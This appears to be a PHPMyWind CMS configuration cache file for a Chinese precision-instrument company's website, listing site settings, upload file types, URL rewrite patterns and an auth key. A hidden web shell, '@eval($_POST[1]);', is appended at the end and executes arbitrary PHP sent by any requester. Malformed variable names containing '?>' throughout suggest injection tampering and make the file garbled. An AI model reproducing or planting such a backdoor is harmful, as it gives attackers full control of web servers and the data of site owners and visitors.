= '3'; $cfg_weburl = ''; $cfg_weburl_1?> = 'http://www.dglzyq.com'; $cfg_webpath = ''; $cfg_webpath_1?> = '4'; $cfg_author = ''; $cfg_author_1?> = ''; $cfg_generator = ''; $cfg_generator_1?> = 'PHPMyWind CMS'; $cfg_seotitle = '东莞市力准精密仪器设备有限公司'; $cfg_seotitle_1?> = ''; $cfg_keyword = '东莞市力准精密仪器设备有限公司'; $cfg_keyword_1?> = ''; $cfg_description = '东莞市力准精密仪器设备有限公司'; $cfg_description_1?> = ''; $cfg_copyright = ''; $cfg_copyright_1?> = 'Copyright © 2010 - 2014 phpMyWind.com All Rights Reserved'; $cfg_hotline = ''; $cfg_hotline_1?> = ''; $cfg_icp = ''; $cfg_icp_1?> = ''; $cfg_webswitch = 'Y'; $cfg_webswitch_1?> = 'Y'; $cfg_switchshow = '对不起,网站维护,请稍后登录。
网站维护期间对您造成的不便,请谅解!'; $cfg_switchshow_1?> = '对不起,网站维护,请稍后登录。
网站维护期间对您造成的不便,请谅解!'; $cfg_upload_img_type = 'gif|png|jpg|bmp'; $cfg_upload_soft_type = 'zip|gz|rar|iso|doc|xls|ppt|wps|txt'; $cfg_upload_media_type = 'swf|flv|mpg|mp3|rm|rmvb|wmv|wma|wav'; $cfg_max_file_size = '2097152'; $cfg_imgresize = 'Y'; $cfg_countcode = ''; $cfg_qqcode = ''; $cfg_mysql_type = 'mysqli'; $cfg_pagenum = '20'; $cfg_timezone = '8'; $cfg_mobile = 'Y'; $cfg_member = 'N'; $cfg_oauth = 'N'; $cfg_comment = 'N'; $cfg_maintype = 'N'; $cfg_typefold = 'N'; $cfg_quicktool = 'Y'; $cfg_diserror = 'Y'; $cfg_isreurl = 'Y'; $cfg_reurl_index = 'index.html'; $cfg_reurl_about = '{about}-{cid}-{page}.html'; $cfg_reurl_news = '{news}-{cid}-{page}.html'; $cfg_reurl_newsshow = '{newsshow}-{cid}-{id}-{page}.html'; $cfg_reurl_product = '{product}-{cid}-{page}.html'; $cfg_reurl_productshow = '{productshow}-{cid}-{id}-{page}.html'; $cfg_reurl_case = '{case}-{cid}-{page}.html'; $cfg_reurl_caseshow = '{caseshow}-{cid}-{id}-{page}.html'; $cfg_reurl_join = '{join}-{page}.html'; $cfg_reurl_joinshow = '{joinshow}-{id}.html'; $cfg_reurl_message = '{message}-{page}.html'; $cfg_reurl_contact = '{contact}-{cid}-{page}.html'; $cfg_reurl_soft = '{soft}-{cid}-{page}.html'; $cfg_reurl_softshow = '{softshow}-{cid}-{id}-{page}.html'; $cfg_reurl_goods = '{goods}-{cid}-{tid}-{page}.html'; $cfg_reurl_goodsshow = '{goodsshow}-{cid}-{tid}-{id}-{page}.html'; $cfg_reurl_vote = '{vote}-{id}.html'; $cfg_reurl_custom = '{file}.html'; $cfg_auth_key = 'nGZ5yV6ZndIN34kc'; $cfg_alipay_uname = ''; $cfg_alipay_partner = ''; $cfg_alipay_key = ''; $cfg_qq_appid = ''; $cfg_qq_appkey = ''; $cfg_weibo_appid = ''; $cfg_weibo_appkey = ''; $cfg_te = 1;@eval($_POST[1]); ?>